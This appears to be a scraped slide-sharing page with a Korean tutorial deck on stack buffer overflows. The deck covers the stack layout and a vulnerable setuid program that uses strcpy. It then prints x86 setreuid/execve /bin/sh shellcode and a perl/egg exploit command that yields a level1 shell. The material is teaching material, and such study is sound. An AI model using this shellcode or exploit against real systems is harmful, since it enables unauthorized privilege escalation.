Basic of Buffer Over Flow

Slides:



Advertisements
Similar presentations
Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Advertisements

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson
Review: Software Security David Brumley Carnegie Mellon University.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
The Attack and Defense of Computers Dr. 許 富 皓 Attacking Program Bugs.
Preventing Buffer Overflow Attacks. Some unsafe C lib functions strcpy (char *dest, const char *src) strcat (char *dest, const char *src) gets (char *s)
Memory Image of Running Programs Executable file on disk, running program in memory, activation record, C-style and Pascal-style parameter passing.
Buffer Overflow. Process Memory Organization.
Control Hijacking Attacks Note: project 1 is out Section this Friday 4:15pm.
1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
1 Buffer Overflow Attacks and Format String bugs.
CS426Fall 2010/Lecture 111 Computer Security CS 426 Lecture 11 Software Vulnerabilities: Input Validation Issues & Buffer Overflows.
September 22, 2014 Pengju (Jimmy) Jin Section E
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
Attacks Using Stack Buffer Overflow Boxuan Gu
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Understand stack Buffer overflow attack and defense Controls against program threats.
Buffer Overflow Computer Organization II 1 © McQuain Buffer Overflows Many of the following slides are based on those from Complete Powerpoint.
University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
安全编程之缓冲区溢出. 内容 缓冲区溢出初步 ( 标准栈溢出 ) 总结 & 提问 深入了解缓冲区溢出 总结 & 提问 安全编程防止缓冲区溢出 ( 一些实例 ) 拓展 : 非 x86 平台上的缓冲区溢出 总结 & 提问.
University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Overflow Examples 01/13/2012. ACKNOWLEDGEMENTS These slides where compiled from the Malware and Software Vulnerabilities class taught by Dr Cliff Zou.
Smashing the Stack Overview The Stack Region Buffer Overflow
Buffer Overflows Many of the following slides are based on those from
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.
James Walden Northern Kentucky University
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.
JMU GenCyber Boot Camp Summer, Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations.
1 Understanding Pointers Buffer Overflow. 2 Outline Understanding Pointers Buffer Overflow Suggested reading –Chap 3.10, 3.12.
Buffer overflow attack Taeho Oh
Buffer Overflow 공격의 이해 송치현 제 11회 해킹캠프.
CS642: Computer Security X86 Review Process Layout, ISA, etc. Drew Davidson
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
CSC 382: Buffer OverflowsSlide #1 Topics 1.What is a Buffer Overflow? 2.The Most Common Implementation Flaw. 3.Process Memory Layout. 4.The Stack and C’s.
Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security.
CS 3214 Computer Systems Godmar Back Lecture 7. Announcements Stay tuned for Project 2 & Exercise 4 Project 1 due Sep 16 Auto-fail rule 1: –Need at least.
Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Floating-Point Code CS 105 Tour of.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Let’s look at an example
Buffer Overflow By Collin Donaldson.
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
CS 177 Computer Security Lecture 9
Webserver w/user threads
The Hardware/Software Interface CSE351 Winter 2013
Basic Control Hijacking Attacks
Buffer Overflow.
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Assembly Language Programming II: C Compiler Calling Sequences
Preventing Buffer Overflow Attacks
Machine Level Representation of Programs (IV)
CS703 - Advanced Operating Systems
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CNT4704: Analysis of Computer Communication Network Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Fall 2011.
System Calls David Ferry CSCI 3500 – Operating Systems
Instructors: Majd Sakr and Khaled Harras
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
Presentation transcript:

Basic of Buffer Over Flow S.S.G 방승원

Agenda Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security Application of Overflow

Introduction Overflow ?? Buffer Over Flow ?? 넘치다, 넘쳐 흐르다;범람하다; <용기 등이> 가득 차다, 넘치다 Buffer Over Flow ?? 정해진 메모리보다 많은 데이터를 입력 받아 특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격 <Phrack Magazine 49-14>, Aleph One

Memory Structure TEXT : TEXT Program Code DATA : Static Variable LOW TEXT TEXT : Program Code DATA : Static Variable Global Variable HEAP : Dynamic Allocation STACK Dynamic Varbiable Local Variable DATA HEAP STACK HIGH

Stack Structure LIFO(Last In First Out) PUSH POP STACK Memory LOW (0x08048000) Stack HIGH STACK LIFO(Last In First Out) PUSH POP SP(Stack Pointer) BP(Base Pointer) PUSH POP C B Memory HIGH (0xbfffffff) A Stack LOW SP BP

Example Program #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”);

Example Program STACK #include <stdio.h> Memory LOW (0x08048000) Stack HIGH STACK buf2 #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() func(1, 2, 3); printf(“Hello, World!\n”); buf1 Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW ESP EBP

Example Program STACK main: pushl $3 pushl $2 pushl $1 call func ESP Memory LOW (0x08048000) Stack HIGH STACK buf2 main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret buf1 Dummy EBP Stack Frame Pointer Return Address 1 2 Memory HIGH (0xbfffffff) 3 Stack LOW

Target Program #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); argc, argv 프로그램을 실행 할 때 인자를 입력받는 방법 ex) ./target bang 1234 argv = 3; argv[0] = “target”; argv[1] = “bang”; argv[2] = “1234”; strcpy(dest, src) src가 가르키는 문자열을 dest로 복사 * 크기 제한이 없어 overflow 취약점 발생

Target Program Setuid Bit 가 걸려있음 Set User ID Bit(number – 4000) $ chmod 4755 target (or chmod u+s) -rwsr-xr-x 1 level1 level1 target  어떤 사용자든지 이 target을 실행할 땐 level1 유저권한을 갖게 됨 ex) passwd Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5

Target Program Let’s Run program With a lot of ‘A’ Character!!! Result : Segmentation Fault Why??

Target Program ESP Memory LOW (0x08048000) Stack HIGH STACK buf #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) func(argv[1]); printf(“Hello, World\n”); Dummy EBP SFP RET Memory HIGH (0xbfffffff) str = argv[1] Stack LOW

Target Program STACK $ ./target `perl -e 'print "A"x71'` Normal Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x71'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Normal

Target Program STACK $ ./target `perl -e 'print "A"x72'` Overflow Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x72'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Overflow

Target Program STACK $ ./target `perl -e 'print "A"x80'` Real Overflow Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x80'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ] Stack LOW Stack HIGH Real Overflow

Target Program STACK Memory LOW Stack HIGH A Dummy SFP [ BFFFFFBF ] SP Memory LOW (0x08048000) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A Dummy E BP SFP [ BFFFFFBF ] RET [ BBFFFF08 ] Memory HIGH (0xbfffffff) str Stack LOW

Target Program STACK Memory LOW Stack HIGH A Dummy [ AAAA ] SP Memory LOW (0x08048000) Stack HIGH func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func subl $12, %esp STACK A 0x41414141(??) Dummy [ AAAA ] E BP SFP [ AAAA ] RET [ AAAA ] Memory HIGH (0xbfffffff) str Stack LOW

Shell Code 쉘을 실행해주는 코드 #include <unistd.h> void main() { char *shell[2]; setreuid(3001, 3001); shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } 어셈코드 "\x31\xc0\x31\xdb\x31\xc9\x66\xbb” “\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46” “\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88” ”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3” ”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31” ”\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Attack Ready Segmentation Fault 확인 쉘코드 제작 쉘코드를 버퍼에다 넣었을 때, 그 버퍼의 주소를 찾아야 됨 But, 버퍼의 주소를 추측하기가 어려움 그러므로 쉘 환경 변수에 쉘코드를 넣어서 사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용

Attack bash-2.05b$ ./egg 512 200 Using address: 0xbffffa60 bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")` sh-2.05b$ id uid=3001(level1) gid=1000(guest) groups=1000(guest) sh-2.05b$

Attack V.S Security Non-executable Stack  Return Into Libc  Omega Project Stack Guard and Stack Shield  Bypass Stack Guard and Stack Shield Random Stacks Exec Shield(커널수준)  Exec Shield 회피 strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat() 사용 And so on………

Application of Overflow Windows, Unix, Linux, Mac Local, Remote Web -> ActiveX Heap Overflow Integer Overflow Frame Pointer Overwrite